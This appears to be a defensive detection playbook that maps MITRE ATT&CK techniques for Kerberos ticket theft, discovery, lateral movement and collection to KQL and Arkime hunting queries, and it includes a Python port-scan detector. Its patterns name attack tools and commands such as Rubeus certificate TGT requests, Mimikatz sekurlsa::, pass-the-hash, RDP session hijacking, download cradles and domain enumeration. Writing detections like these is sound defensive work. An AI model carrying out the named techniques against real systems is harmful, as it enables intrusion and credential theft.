KQLWindows — Certificate Services issuing certs to standard users from vulnerable templates
winlog.event_id: 4887 AND winlog.event_data.Requester: "*\\*" AND winlog.event_data.CertificateTemplate: "*WebServer*"
KQLSysmon — Rubeus.exe requesting TGT via certificate
process.name: "Rubeus.exe" AND process.command_line: ("*asktgt*" AND "*/certificate:*")
T1558

Steal or Forge Kerberos Tickets

[MITRE]
Kerberoasting, AS-REP Roasting, Golden Tickets — adversaries request service tickets and crack them offline (RC4 encryption), or forge permanent Domain Admin tickets using stolen krbtgt hashes.
KQLWindows — Kerberoasting: high volume RC4 TGS requests from single user
winlog.event_id: 4769 AND winlog.event_data.TicketEncryptionType: "0x17" AND winlog.event_data.ServiceName: ("*sql*" OR "*svc*" OR "*admin*") | stats count by user.name | where count > 15
ArkimeKerberoasting over wire — TGS-REQ using RC4 encryption
kerberos.msg_type == 14 AND kerberos.ENCTYPE == 23
Discovery TA0007
Techniques adversaries use to gain knowledge about the system and internal network. Discovery occurs throughout an operation and data should be viewed as part of a chain of behavior.
T1007

System Service Discovery

[MITRE]
KQLService discovery commands — sc, net, tasklist, systemctl
event.code: 4688 AND ("sc query" OR (tasklist AND svc) OR (systemctl AND type AND service) OR (net AND start))
"sc query" | tasklist /svc | systemctl --type=service | net start
KQLDetects built-in Windows utilities used for service discovery
event.type: start AND (((process.name: "net.exe") AND process.args: ("start", "use") AND process.args_count == 2) OR ((process.name: "sc.exe") AND process.args: ("query", "q*")) OR ((process.name: "tasklist.exe") AND process.args: "/svc"))
PowerShellPowerShell service discovery
powershell AND Get-Service
T1016

System Network Configuration Discovery

[MITRE]
KQLNetwork config discovery commands — ipconfig, arp, nbtstat, route
event.category: process AND event.type: (start OR process_started) AND process.name: (ipconfig.exe)
event.type: ("start" OR "process_started") AND ((process.name: "nbtstat.exe" AND process.args: ("-n", "-s")) OR (process.name: "arp.exe" AND process.args: "-a"))
process.name: netsh.exe
T1018

Remote System Discovery

[MITRE]
KQLqwinsta — display sessions on remote systems
qwinsta
"System.DirectoryServices.DirectoryEntry" AND LDAP
"show cdp neighbors" | "show arp"
KQLPing and tracert used for host discovery
process.name: (ping.exe OR tracert.exe)
event.code: 4663
PowerShellPowerShell domain computer enumeration
powershell AND Find-DomainLocalGroupMember
T1033

System Owner/User Discovery

[MITRE]
KQLUser/owner discovery via whoami, hostname, id commands
event.category: process AND event.type: (start OR process_started) AND process.name: (whoami.exe OR HOSTNAME.EXE OR who OR whoami)
"net use" OR "quser" OR "query user"
wmic AND useraccount | quser | qwinsta
KQLPowerShell user enumeration commands
powershell AND ("Get-LocalUser" OR "Get-WmiObject Win32" OR "Get-ComputerInfo" OR "Get-Acl" OR "Get-ADUser")
event.code: 4688 AND process.name: at.exe
T1046

Network Service Scanning

[MITRE]
KQLKnown scanning tools executed
process.name: (nmap.exe OR nc.exe OR ping.exe OR tcping.exe OR tracert.exe OR pathping.exe OR osql.exe)
nmap
ArkimeNetwork service discovery — check for multi-port connection attempts
tags == network-service-discovery AND ip.src != <MP IPs>
KQLDetect potential network scan — connection attempts to many ports
event.action: "network-flow"   -- look for one source connecting to 20+ destination ports
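The "one source connecting to 20+ destination ports" check is described in words above but not written as a query. This added Python example (not from the playbook) implements it over flow records with a sliding time window, and also reports the horizontal case (one port across many destination hosts), which the card does not spell out. The flow records, the 5-minute window and the host threshold are constructed assumptions.

```python
"""Fan-out detection over network-flow records (added example, not from the playbook).

Implements the check the card describes in words: one source reaching 20 or more
distinct destination ports on a host within a time window (vertical scan). It also
reports the horizontal case (one port across many destination hosts). Flow records
are constructed for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

PORT_THRESHOLD = 20      # distinct ports per (source, destination) pair, per the card
HOST_THRESHOLD = 20      # distinct hosts per (source, port) pair, added generalisation
WINDOW = timedelta(minutes=5)  # assumed sliding window


def make_flows():
    """Constructed flow records in the shape of event.action: network-flow."""
    base = datetime(2024, 5, 1, 10, 0, 0)
    flows = []
    # 10.0.0.5 sweeps ports 1..25 on one host within half a minute: vertical scan
    for i, port in enumerate(range(1, 26)):
        flows.append({"@timestamp": base + timedelta(seconds=i), "source.ip": "10.0.0.5",
                      "destination.ip": "10.0.0.50", "destination.port": port})
    # 10.0.0.6 probes port 445 on 22 different hosts: horizontal scan
    for i in range(22):
        flows.append({"@timestamp": base + timedelta(seconds=30 + i), "source.ip": "10.0.0.6",
                      "destination.ip": f"10.0.1.{i + 1}", "destination.port": 445})
    # 10.0.0.7 touches 25 ports but spread over more than an hour: never 20 in one window
    for i, port in enumerate(range(1, 26)):
        flows.append({"@timestamp": base + timedelta(minutes=3 * i), "source.ip": "10.0.0.7",
                      "destination.ip": "10.0.0.51", "destination.port": port})
    return flows


def _windowed_distinct(keyed, window, threshold):
    """keyed: key -> list of (timestamp, value).

    Returns {key: max_distinct} for keys where the number of distinct values seen
    inside some sliding window of length `window` reaches `threshold`.
    """
    hits = {}
    for key, items in keyed.items():
        items.sort()
        start = 0
        seen = defaultdict(int)  # value -> occurrences currently inside the window
        for ts, value in items:
            seen[value] += 1
            # slide the window start forward until it is within `window` of ts
            while ts - items[start][0] > window:
                old = items[start][1]
                seen[old] -= 1
                if seen[old] == 0:
                    del seen[old]
                start += 1
            if len(seen) >= threshold:
                hits[key] = max(hits.get(key, 0), len(seen))
    return hits


def detect_scans(flows, window=WINDOW, port_threshold=PORT_THRESHOLD, host_threshold=HOST_THRESHOLD):
    """Return {"vertical": {(src, dst): n_ports}, "horizontal": {(src, port): n_hosts}}."""
    by_pair = defaultdict(list)   # (src, dst)  -> [(ts, dst_port)]
    by_port = defaultdict(list)   # (src, port) -> [(ts, dst_ip)]
    for f in flows:
        by_pair[(f["source.ip"], f["destination.ip"])].append((f["@timestamp"], f["destination.port"]))
        by_port[(f["source.ip"], f["destination.port"])].append((f["@timestamp"], f["destination.ip"]))
    return {"vertical": _windowed_distinct(by_pair, window, port_threshold),
            "horizontal": _windowed_distinct(by_port, window, host_threshold)}


if __name__ == "__main__":
    for kind, hits in detect_scans(make_flows()).items():
        for key, n in hits.items():
            print(f"{kind}: {key} -> {n} distinct")
```

Without the window, the slow sweep from 10.0.0.7 would also cross the threshold, which is why the aggregation in the card needs a time bound before it is useful for triage.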
T1057

Process Discovery

[MITRE]
KQLtasklist.exe, qwinsta — examine parent, user, working directory
process.name: tasklist.exe
qwinsta
hostname OR ipconfig OR net OR quser OR qwinsta OR systeminfo OR tasklist OR dsquery OR whoami
T1069

Permissions Group Discovery

[MITRE]
KQLLower privilege accounts enumerating admin groups
event.type: ("start" OR "process_started") AND process.name: ("net.exe" OR "net1.exe") AND process.args: ("group" OR "user" OR "localgroup") AND process.args: ("admin" OR "Domain Admins" OR "Remote Desktop Users" OR "Enterprise Admins") AND NOT process.args: "/add"
KQLnet localgroup, net group /domain, Linux groups/ldapsearch
net localgroup
"net group /domain"
groups | ldapsearch   -- Linux
T1082

System Information Discovery

[MITRE]
KQLsysteminfo, netcfg, wmic system info queries
event.category: process AND event.type: (start OR process_started) AND process.name: (systeminfo.exe OR netcfg.exe)
event.type: start AND (process.name: cmd.exe AND process.args: (ver* OR systeminfo.exe OR hostname.exe)) OR (process.name: wmic.exe AND process.args: (os AND get))
T1083

File and Directory Discovery

[MITRE]
KQLtree.com and dir with /F flag — examine parent, user, output destination
process.name: cmd.exe AND process.command_line: *tree* AND process.args: "\/F"
process.name: tree.com
dir OR ls OR find
event.type: "start" AND process.name: "cmd.exe" AND process.args: "/c" AND process.args: ("set" OR "dir")
PowerShellRecursive directory listing via Get-ChildItem
powershell.exe AND get-childitem AND recursive
T1087

Account Discovery

[MITRE]
KQLnet.exe and net1.exe — account discovery via built-in tools
net.exe OR net1.exe
process.command_line: (*net.exe* OR *net1.exe*)
KQLPowerShell account discovery commands
powershell AND (Get-LocalUser OR Get-WmiObject OR Get-NetUser)
winlog.event_id: (4103 OR 4104) AND (*Get-WmiObject* OR *Get-LocalUser* OR *Get-NetUser*)
winlog.event_id: (4103 OR 4104) AND (*Get-DomainUser* OR *Get-ADUser* OR *Get-ADGroupMember*)
KQLnet user commands — local and domain enumeration
"net user"             -- all local accounts
"net user /domain"     -- domain accounts (requires domain creds)
"net user Administrator"
"net account" | "net localgroup"
KQLT1087.001 Local Account — net.exe or PowerShell Get-User
process.name: ("net.exe" OR "net1.exe")
process.name: powershell.exe AND process.command_line: *Get-User*
KQLT1087.002 Domain Account — domain enumeration commands
powershell AND Get-DomainUser
powershell AND (Get-ADUser OR Get-ADGroupMember)
"net user /domain" OR "net group /domain"
event.code: (4798 OR 4799)
KQLMonitoring event IDs for local group enumeration
event.code: (4798 OR 4799)
  4798: User's local group membership enumerated
  4799: Security enabled local group membership enumerated
T1135

Network Share Discovery

[MITRE]
KQLnet view, net share, Get-SmbShare commands
net view OR "net share"
"get-smbshare"
process.command_line: (*smbclient* AND *\-L*)
Image: (*\\net.exe OR *\\net1.exe) AND CommandLine: *view*
T1049

System Network Connections Discovery

[MITRE]
KQLNetwork connection discovery commands
netstat OR qwinsta
"net use"       -- manage network connections / list mapped drives
"net session"   -- active sessions on computer
"netstat -a"    -- active TCP connections
"arp" OR "arp -a"   -- IP to MAC mappings
"netsh interface ip show address"   -- display IP of connected interface
T1012

Query Registry

[MITRE]
KQLreg.exe query command execution
event.type: ("start" OR "process_started") AND process.name: "reg.exe" AND process.args: "query"
event.code: 4657   -- registry value modified
KQLPowerShell PSDrive registry access
event.code: 4103 AND (process.command_line: (*New-PSDrive* AND *Registry*) OR process.command_line: (*HKEY_CLASSES_ROOT* OR *HKCR*))
T1482

Domain Trust Discovery

[MITRE]
KQLnltest /domain_trusts — enumerate domain trust relationships
"nltest /domain_trusts"
InfoAdFind.exe continues to be seen across the majority of breaches and is frequently used for domain trust discovery. Detect renamed AdFind usage through behavior analysis rather than the file name.
Also monitor LDAP and MSRPC traffic for anomalous patterns that do not match expected protocol flows during AD enumeration.
T1518

Software Discovery

[MITRE]
KQLSecurity software discovery via wmic, netsh, tasklist
netsh AND advfirewall
(wmic.exe OR powershell.exe) AND SecurityCenter
sc AND query AND windefend
tasklist
findstr AND (virus OR cb OR defender OR cylance OR mc)
KQLRegistry query for installed software (UserAssist)
process.name: reg.exe AND process.args: (*query* AND *HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\*)
process.name: reg.exe AND process.command_line: *Software*
KQLWMIC querying SecurityCenter for AV/Firewall info
event.type: (start OR process_started) AND process.name: wmic.exe AND process.args: "/namespace:\\\\root\\SecurityCenter2" AND process.args: "Get"
T1201

Password Policy Discovery

[MITRE]
KQLPassword policy commands by OS
-- Windows:
("net accounts" AND "/domain") OR "Get-ADDefaultDomainPasswordPolicy"
-- Linux:
"chage -l"
"cat" AND "/etc/pam.d/common-password"
-- macOS:
"pwpolicy getaccountpolicies"
-- Network devices:
"show aaa" OR "show aaa common-criteria policy all"
KQLWindows event logs for Get-ADD* PowerShell commands
winlog.api: wineventlog AND NOT event.code: (7024 OR 7036 OR 7034 OR 9009) AND (winlog.event_data.param1: *Get-ADD* OR winlog.event_data.param2: *Get-ADD*)
T1120

Peripheral Device Discovery

[MITRE]
KQLfsutil.exe used to gather info about peripheral devices
event.type: ("start" OR "process_started") AND process.name: "fsutil.exe" AND process.args: "fsinfo" AND process.args: "drives"
T1124

System Time Discovery

[MITRE]
KQLSystem time discovery commands
process.name: net* AND process.command_line: *time*
event.type: start AND ((process.name: net* AND process.command_line: *time* AND NOT process.args: /set) OR (process.name: w32t* AND process.command_line: *tz*)) AND NOT user.id: ("S-1-5-18" OR "S-1-5-19" OR "S-1-5-20")
event.type: start AND (process.name: tzutil.exe AND process.args: "/g")
T1613

Container and Resource Discovery

[MITRE]
KQLReading /proc virtual filesystem for container discovery indicators
Image: (*awk OR *\/cat OR *grep OR *\/head OR *\/less OR *\/more OR *\/nl OR *\/tail) AND (CommandLine: *\/proc\/2\/* OR (CommandLine: *\/proc\/* AND (CommandLine: (*\/cgroup OR *\/sched))))
KQLContainer enumeration commands
docker ps
docker inspect
kubectl get pods
kubectl get nodes
T1654

Log Enumeration

[MITRE]
KQLLog enumeration via wevtutil, PowerShell Get-EventLog/Get-WinEvent
wevtutil AND <log name>   -- Application, Security, System
process.name: CollectGuestLogs.exe
powershell AND Get-EventLog AND <log name>
powershell AND Get-WinEvent AND LogName
"event viewer" OR eventvwr
%SystemDrive%\\inetpub\\logs\\LogFiles   -- IIS log access
KQLLinux log enumeration
var AND log AND ls
var AND log AND (tail OR head OR more OR cat)
T1087.001

Account Discovery: Local Account

[MITRE]
Adversaries enumerate local accounts on compromised systems to understand the access landscape and identify privileged accounts for escalation or lateral movement.
KQLnet.exe/net1.exe local user/group enumeration — verify legitimacy of caller
process.name: ("net.exe" OR "net1.exe") AND process.command_line: (*user* OR *localgroup* OR *group*)
-- Check: parent process, working dir, RPC exclusions (ruby), user context
KQLPowerShell Get-LocalUser local account enumeration
process.name: powershell.exe AND process.command_line: *Get-LocalUser*
T1087.002

Account Discovery: Domain Account

[MITRE]
Adversaries enumerate domain accounts and groups using built-in tools (net, PowerShell AD cmdlets) or third-party tools to identify high-value targets like Domain Admins.
KQLnet user /domain or net group /domain enumeration
process.name: ("net.exe" OR "net1.exe") AND process.command_line: (*/domain*)
process.command_line: (*net user /domain* OR *net group /domain*)
KQLPowerShell domain user/group enumeration cmdlets
process.name: powershell.exe AND process.command_line: (*Get-DomainUser* OR *Get-ADUser* OR *Get-ADGroupMember*)
KQLSecurity event IDs for local/group member enumeration
event.code: (4798 OR 4799)
-- 4798: User's local group membership enumerated
-- 4799: Security-enabled local group membership enumerated
T1010

Application Window Discovery

[MITRE]
Adversaries enumerate visible application window titles to reveal exactly what the user is working on — password managers, internal portals, browsers — without accessing any files.
KQLtasklist /v extracting verbose window titles from running tasks
process.name: "tasklist.exe" AND process.command_line: "* /v *"
T1217

Browser Information Discovery

[MITRE]
Adversaries search Chrome, Edge, and Firefox for bookmarks, browsing history, and installed extensions to map internal web infrastructure without scanning the network directly.
KQLCommand line searching browser artifact databases (Bookmarks, History SQLite)
process.name: ("cmd.exe" OR "powershell.exe" OR "findstr.exe") AND process.command_line: ("*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks*" OR "*\\AppData\\*\\History*")
T1580

Cloud Infrastructure Discovery

[MITRE]
Adversaries burst-enumerate AWS/Azure/GCP resources (VMs, networks, serverless functions) via Describe*/List* API calls to map the cloud architecture and identify compute resources to compromise or hijack.
KQLAggressive enumeration of AWS EC2 instances via CloudTrail
event.dataset: "aws.cloudtrail" AND event.action: "DescribeInstances" | stats count by user.name | where count > 50
T1538

Cloud Service Dashboard

[MITRE]
Adversaries log into cloud management consoles (AWS Management Console, Azure Portal) with stolen credentials or session cookies to visually explore the entire cloud environment via GUI.
KQLAWS Console logins from unknown or unapproved IP addresses
event.dataset: "aws.cloudtrail" AND event.action: "ConsoleLogin" AND event.outcome: "success" AND NOT source.ip: ("[Corporate_IP_Ranges]")
T1526

Cloud Service Discovery

[MITRE]
Adversaries query which cloud services the org uses (Lambda, DynamoDB, EKS) via tools like ScoutSuite or Pacu that enumerate every service endpoint across all regions simultaneously.
KQLWidespread enumeration of Azure services/providers within a subscription
event.dataset: "azure.activitylogs" AND event.action: "Microsoft.Resources/subscriptions/providers/read"
T1619

Cloud Storage Object Discovery

[MITRE]
Adversaries map cloud storage (S3 Buckets, Azure Blob, GCP Buckets) to find database backups, customer PII, or hardcoded credentials — a common precursor to massive data exfiltration.
KQLListBuckets / ListObjects API calls — precursor to mass download
event.dataset: "aws.cloudtrail" AND event.provider: "s3.amazonaws.com" AND event.action: ("ListBuckets" OR "ListObjects")
T1622

Debugger Evasion

[MITRE]
Adversaries probe the system for active analysis tools (Wireshark, Sysinternals, x64dbg, sandbox drivers like vboxguest.sys) and alter behavior or terminate to avoid leaving forensic artifacts. Also appears in Defense Evasion.
KQLCommand line utilities querying for specific security or analysis processes
process.name: ("tasklist.exe" OR "wmic.exe") AND process.command_line: ("*wireshark*" OR "*sysmon*" OR "*procmon*")
T1652

Device Driver Discovery

[MITRE]
Adversaries enumerate installed device drivers to find outdated, vulnerable third-party drivers (old AV or hardware diagnostic drivers) that can be exploited locally for kernel-level privilege escalation.
KQLdriverquery.exe or WMI Win32_PnPSignedDriver enumeration
process.name: ("driverquery.exe" OR "powershell.exe") AND process.command_line: ("*driverquery*" OR "*Get-WmiObject Win32_PnPSignedDriver*")
T1615

Group Policy Discovery

[MITRE]
Adversaries enumerate GPOs in Active Directory to understand the domain's security posture — password policies, LAPS configurations, deployed scripts, and mapped drives that reveal privilege escalation paths.
KQLgpresult.exe or PowerShell Get-DomainGPO / Get-GPO enumeration
process.name: ("gpresult.exe" OR "powershell.exe") AND process.command_line: ("* /z*" OR "* /v*" OR "*Get-DomainGPO*" OR "*Get-GPO*")
T1680

Local Storage Discovery

[MITRE]
Adversaries query attached local storage to find unencrypted secondary drives, hidden partitions, or mounted VHDs containing backups, databases, or sensitive files outside the primary OS drive.
KQLdiskpart, wmic logicaldisk, or Get-Volume enumerating physical/logical disk structures
process.name: ("diskpart.exe" OR "wmic.exe" OR "powershell.exe") AND process.command_line: ("*list volume*" OR "*logicaldisk get*" OR "*Get-Volume*")
KQLLinux block device enumeration via lsblk, fdisk, df
process.name: ("lsblk" OR "fdisk" OR "df") AND process.command_line: ("*-l*" OR "*-h*")
T1040

Network Sniffing

[MITRE]
Adversaries passively sniff broadcast traffic (ARP, mDNS, DHCP) to map hosts, OS types, and server relationships without sending a single active scan packet — evading IDS/IPS detection. Also appears in Credential Access.
KQLNetwork sniffing utilities executed by non-root users for passive subnet mapping
process.name: ("tcpdump" OR "tshark" OR "ngrep") AND process.command_line: ("*-i eth0*" OR "*-i any*") AND NOT user.name: "root"
T1614

System Location Discovery

[MITRE]
Adversaries query the host for geographic location via external IP lookup services (ifconfig.me, ipinfo.io), OS language/keyboard settings, or Wi-Fi BSSIDs to verify they hit the intended target rather than a honeypot.
KQLcurl/wget/Invoke-WebRequest reaching external IP identification services
process.name: ("curl.exe" OR "wget.exe" OR "powershell.exe") AND process.command_line: ("*ifconfig.me*" OR "*icanhazip.com*" OR "*ipinfo.io*")
ArkimeHTTP requests to known IP lookup domains (often hardcoded in malware)
host == "ifconfig.me" || host == "icanhazip.com" || host == "ipinfo.io"
T1673

Virtual Machine Discovery

[MITRE]
Adversaries query WMI BIOS manufacturer fields or check MAC address OUIs to determine if running on bare-metal or a VM (VMware, Hyper-V, AWS EC2). Also tied to Virtualization/Sandbox Evasion.
KQLWMI queries targeting system manufacturer — looking for "VMware, Inc." or "Microsoft Corporation"
process.name: ("wmic.exe" OR "powershell.exe") AND process.command_line: ("*computersystem get manufacturer*" OR "*Get-WmiObject Win32_ComputerSystem*")
T1497

Virtualization/Sandbox Evasion

[MITRE]
Malware checks CPU core count, RAM size (<4GB), or analysis tool presence to determine if being run in an automated sandbox before executing its payload. Also appears in Defense Evasion.
KQLSuspicious scripts checking hardware resource limits — classic sandbox evasion check
process.name: ("wmic.exe" OR "powershell.exe") AND process.command_line: ("*memorychip*" OR "*cpu get*")
Lateral Movement TA0008
Techniques adversaries use to move through your environment — pivoting from compromised system to system to reach targets.
T1021

Remote Services

[MITRE]
KQLSSH used to establish RDP over reverse SSH tunnel
event.type: "start" AND process.args: "*:3389" AND process.args: ("-L" OR "-P" OR "-R" OR "-pw" OR "-ssh")
process.args: ("-L" OR "-P" OR "-R" OR "-pw" OR "-ssh") AND process.args: *3389*
KQLDCOM/HTA lateral execution (mshta with -Embedding)
event.type: ("start" OR "process_started") AND process.name: "mshta.exe" AND process.args: "-Embedding"
InfoSuspicious command line patterns commonly seen in lateral movement tools
PuTTY port forwarding: -R * -pw
Secure copy (scp): -pw * * @
Mimikatz: sekurlsa::
RAR encryption: -hp
Look for IP patterns: \d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}
T1021.001

Remote Desktop Protocol

[MITRE]
KQLRDP connection via mstsc.exe, port changes, failed access
event.action: creation AND process.name: mstsc.exe
event.action: "Network connection detected" AND destination.port: 3389 AND NOT process.executable: ("C:\\Windows\\System32\\mstsc.exe" OR "C:\\Windows\\System32\\svchost.exe")
"reg add" OR "REG_DWORD" OR ("RDP-TCP" AND "PortNumber")   -- RDP port change
KQLFailed RDP attempts and local loopback RDP sessions
winlog.channel: Security AND event.code: 4825   -- Failed RDP auth by authenticated user
winlog.channel: Security AND event.code: 4624 AND winlog.event_data.LogonType: 10 AND source.ip: ("::1" OR "127.0.0.1")   -- Local loopback RDP (RDP hijacking precursor)
KQLStartup files dropped via mstsc.exe (persistence after lateral movement)
(process.name: mstsc.exe OR process.pid: 4) AND file.path: *Microsoft*Startup*
T1021.004

Remote Services: SSH

[MITRE]
ArkimeSSH and PuTTY traffic
port == 22 || protocols == ssh
putty.exe OR plink.exe OR pscp.exe
T1021.006

Remote Services: WinRM

[MITRE]
KQLWinRM execution indicators — wsmprovhost, wmiprvse
wsmprovhost.exe
process.name: wmiprvse.exe
winrm
ArkimeWinRM traffic on ports 5985 (HTTP) and 5986 (HTTPS)
protocols == http AND port == 5985
destination.port: 5985 AND (network.protocol: http OR log.file.path: *http.log)
T1210

Exploitation of Remote Services

[MITRE]
ArkimeRemote service protocols — RDP, Telnet, SSH, VNC, VPN
protocols == rdp  || port == 3389
protocols == telnet || port == 23
protocols == ssh || port == 22
protocols == vnc || port == 5900
protocols == [openvpn, wireguard, ike2, ipsec, pptp, sstp] || port == [500, 4500, 443, 1194, 51820, 1723]
KQLWindows remote services event codes
event.code: (1149 OR 21 OR 25 OR 1024)
  1149: RDP auth succeeded | 21: Session logon | 25: Session reconnect | 1024: RDP client connection
T1534

Internal Spearphishing

[MITRE]
ArkimeInternal email traffic on email ports — review all
port.dst == [25, 143, 993, 110, 995]
email.fn == EXISTS!
KQLMacro-enabled attachment click from Outlook (PowerShell download)
powershell AND "Invoke-WebRequest" AND "-OutFile"
event.code: 4663 AND file.extension: "url" AND NOT process.name: "explorer.exe"
KQLAny suspicious process from Outlook (internal phishing)
event.action: "Process Create (rule: ProcessCreate)" AND process.parent.name: outlook.exe AND process.name: (arp.exe OR bitsadmin.exe OR certutil.exe OR cmd.exe OR cscript.exe OR mshta.exe OR net.exe OR nltest.exe OR ping.exe OR powershell.exe OR reg.exe OR regsvr32.exe OR sc.exe OR schtasks.exe OR tasklist.exe OR whoami.exe OR wmic.exe OR wscript.exe)
T1570

Lateral Tool Transfer

[MITRE]
ArkimeSMB traffic to/from hosts of interest
protocols == smb AND ip == [<IPs of interest>]
KQLWindows Filtering Platform blocking connections (lateral movement blocked)
event.code: (5157 OR 5159 OR 5155 OR 5031)
  5157: WFP blocked connection | 5159: WFP blocked bind to port
  5155: WFP blocked app from listening | 5031: Windows Firewall blocked incoming connection
KQLNetwork share access events — monitor for unexpected file transfers
event.code: (5140 OR 5142 OR 5144 OR 5145)
  5140: Network share accessed | 5142: Share added | 5144: Share deleted | 5145: Share access check
T1091

Replication Through Removable Media

[MITRE]
KQLRemovable media access events
event.code: 4663 AND "removable storage"
T1563

Remote Service Session Hijacking

[MITRE]
With SYSTEM privileges, adversaries use tscon.exe to hijack a Domain Admin's disconnected RDP session, gaining full admin access without needing their password or triggering an authentication event.
KQLtscon.exe connecting to a different session ID — RDP session hijack indicator
process.name: "tscon.exe" AND process.command_line: ("* /dest:*" OR "* /v *") AND NOT user.name: "SYSTEM"
InfoNetwork visibility note — session hijack is host-only
Session hijacking occurs inside host OS memory and Terminal Services. Network traffic continues to look like a normal encrypted RDP stream. Rely entirely on endpoint/process logs.
T1072

Software Deployment Tools

[MITRE]
Hijacking a central IT deployment server (SCCM, Intune, PDQ Deploy, Ansible) allows pushing malware to thousands of endpoints simultaneously via highly trusted SYSTEM-level agents. Also appears in Execution.
KQLSoftware deployment agents spawning anomalous or destructive commands
process.parent.name: ("CcmExec.exe" OR "IntuneManagementExtension.exe" OR "PDQDeploy.exe") AND process.name: ("powershell.exe" OR "cmd.exe") AND process.command_line: ("*DownloadString*" OR "*vssadmin*" OR "*Net.WebClient*")
T1080

Taint Shared Content

[MITRE]
Instead of hacking a remote machine directly, adversaries place malicious LNK shortcuts or macro-enabled documents on heavily used corporate network shares and wait for users from other departments to open them.
KQLCreation of malicious shortcuts or scripts on central file servers (Event ID 5145)
winlog.event_id: 5145 AND winlog.event_data.RelativeTargetName: ("*.lnk" OR "*.vbs" OR "*.wsf" OR "*.scr") AND winlog.event_data.AccessMask: "0x2"
ArkimeSMB writes of executable/script files to non-administrative file shares
protocols == smb && smb2.filename == r".*\.(lnk|vbs|scr)$"
T1550

Use Alternate Authentication Material

[MITRE]
Pass-the-Hash (PtH) and Pass-the-Ticket (PtT) let adversaries authenticate via SMB or WinRM using stolen NTLM hashes or Kerberos tickets without ever knowing the plaintext password or triggering MFA. Also in Defense Evasion.
KQLPass-the-Hash indicator — Logon Type 9 (NewCredentials) with seclogo process
winlog.event_id: 4624 AND winlog.logon.type: 9 AND winlog.event_data.LogonProcessName: "seclogo"
InfoNetwork visibility note — PtH looks like legitimate NTLM
Over the network, a PtH attack looks exactly like a legitimate NTLM authentication sequence. Network tools cannot distinguish a stolen hash from a legitimately hashed password. Rely on endpoint logging.
Collection TA0009
Techniques adversaries use to gather information from various sources in your environment prior to exfiltration.
T1005

Data from Local System

[MITRE]
ArkimeSMB traffic to hosts of interest
protocols == smb AND ip == [<IPs of interest>]
KQLWindows Filtering Platform events for blocked connections
event.code: (5157 OR 5159 OR 5155 OR 5031)
KQLSQL commands โ€” look for SQL data collection via SQLCMD
"SELECT" AND "FROM" AND "WHERE"
process.name: (SQLCMD.EXE OR sqlcmd.exe)
KQLRecon commands for local data discovery
event.type: start AND ("systeminfo" OR "ipconfig" OR "hostname" OR "net user" OR "net localgroup" OR "net group" OR "net share" OR "net view" OR "netstat" OR "*tasklist*" OR "dir*" OR "ls*")
T1025

Data from Removable Media

[MITRE]
KQLFile access on removable storage
event.code: 4663 AND event.action: "Removable Storage"
event.code: 4663 AND NOT winlog.event_data.ObjectName: "C:\\*" AND winlog.event_data.ObjectType: File
PowerShellIdentify documents on USB/removable media via PowerShell
process.name: powershell.exe AND process.command_line: (*Get-Volume* AND *Removable*)
T1039

Data from Network Shared Drive

[MITRE]
KQLSMB port 445 access — unexpected/abnormal network share access
destination.port: 445
destination.port: 445 AND NOT source.ip: <int IPs>
ArkimeHTTP URIs with suspicious executable/archive file extensions
http.uri == [*.exe, *.dll, *.zip, *.7z, *.php, *.aspx] AND http.uri != [*google*, *windowsupdate*]
http.uri: (*.exe OR *.dll OR *.zip OR *.7z OR *.rar OR *.raw OR *.iso OR *.php OR *.aspx) AND NOT http.uri: (*google* OR *windowsupdate*)
T1074.001

Data Staged: Local Data Staging

[MITRE]
KQLFiles staged in Temp or Recycle Bin directories
file.path: ("*C:\\Windows\\Temp*" OR "*$Recycle.Bin*")
file.path: (*Temp* OR *temp* OR *Recycle*)
T1114

Email Collection

[MITRE]
KQLLocal system email file access (Sysmon event 10)
event.code: 10 AND TargetImage: (*.edb OR *.eml OR *.emlx OR *.mbox OR *.msg OR *.ost OR *.pst OR *.vcf)
KQLT1114.001 Local Email Collection — PST/OST file access via command line
process.command_line: (*ost* OR *pst*)
KQLT1114.002 Remote Email Collection — Exchange mailbox export request
process.name: (powershell.exe OR pwsh.exe OR powershell_ise.exe) AND process.args: New-MailboxExportRequest*
ArkimeSMTP protocols and common email ports
protocols == smtp || port.dst == [110, 146, 465, 587, 993, 995]
ArkimeSMTP traffic with attachments and external connections (possible exfil via forwarding)
protocols == smtp AND email.has-header.value == Forward AND email.md5 == EXISTS!
KQLPowerShell cmdlet for email collection (event 4104)
event.code: 4104
-- look for: Get-Inbox
T1113

Screen Capture

[MITRE]
[KQL] PowerShell screen capture via System.Drawing.Bitmap
event.category: process AND powershell.file.script_block_text: (CopyFromScreen AND ("System.Drawing.Bitmap" OR "Drawing.Bitmap"))
T1115

Clipboard Data

[MITRE]
[KQL] Clipboard access via clip.exe or Get-Clipboard
process.name: clip.exe
process.command_line: *Get-Clipboard*
T1119

Automated Collection

[MITRE]
[KQL] Automated collection via scripts — compressed file creation in temp/appdata
event.code: (11 OR 1) AND file.extension: <compressed file extension>
event.code: 11 AND file.extension: (zip OR rar OR 7z) AND file.path: (C:\\Windows\\Temp\\* OR *\\AppData\\Roaming\\Temp\\* OR *\\AppData\\Local\\Temp\\*)
event.code: 4688 AND process.parent.name: (cscript.exe OR wscript.exe)
event.code: 4663 AND winlog.event_data.ObjectName: (C:\\Windows\\Temp\\* OR *\\AppData\\Roaming\\Temp\\* OR *\\AppData\\Local\\Temp\\*)
[Arkime] SMB/FTP/email transfers of compressed files
smb.fn == *.<compression ext>
ftp.fn == *.<compression ext>
email.fn == *.<compression ext>
T1123

Audio Capture

[MITRE]
[KQL] SoundRecorder or PowerShell audio capture tools
process.name: Soundrecorder.exe
process.name: powershell.exe AND process.command_line: *WindowsAudioDevice-Powershell-Cmdlet*
[KQL] PowerShell script block text with audio capture APIs
event.category: process AND powershell.file.script_block_text: ("Get-MicrophoneAudio" OR "WindowsAudioDevice-Powershell-Cmdlet" OR (waveInGetNumDevs AND mciSendStringA)) AND NOT user.id: "S-1-5-18"
[KQL] Known audio capture applications and audio DLLs
process.name: (*audio* OR *sound* OR *microphone*) AND NOT process.parent.name: (explorer.exe OR *system*)
event.code: 7 AND file.name: (avrt.dll OR winmm.dll OR msacm32.dll)   -- Sysmon 7 (ImageLoaded): audio DLLs loaded into a process
Audacity OR "screen capture" OR Ardour OR Ocenaudio
T1213

Data from Information Repositories

[MITRE]
[Suricata] SMB file exfiltration detection rules (fileext and filemagic each take a single value, so use one rule per file type)
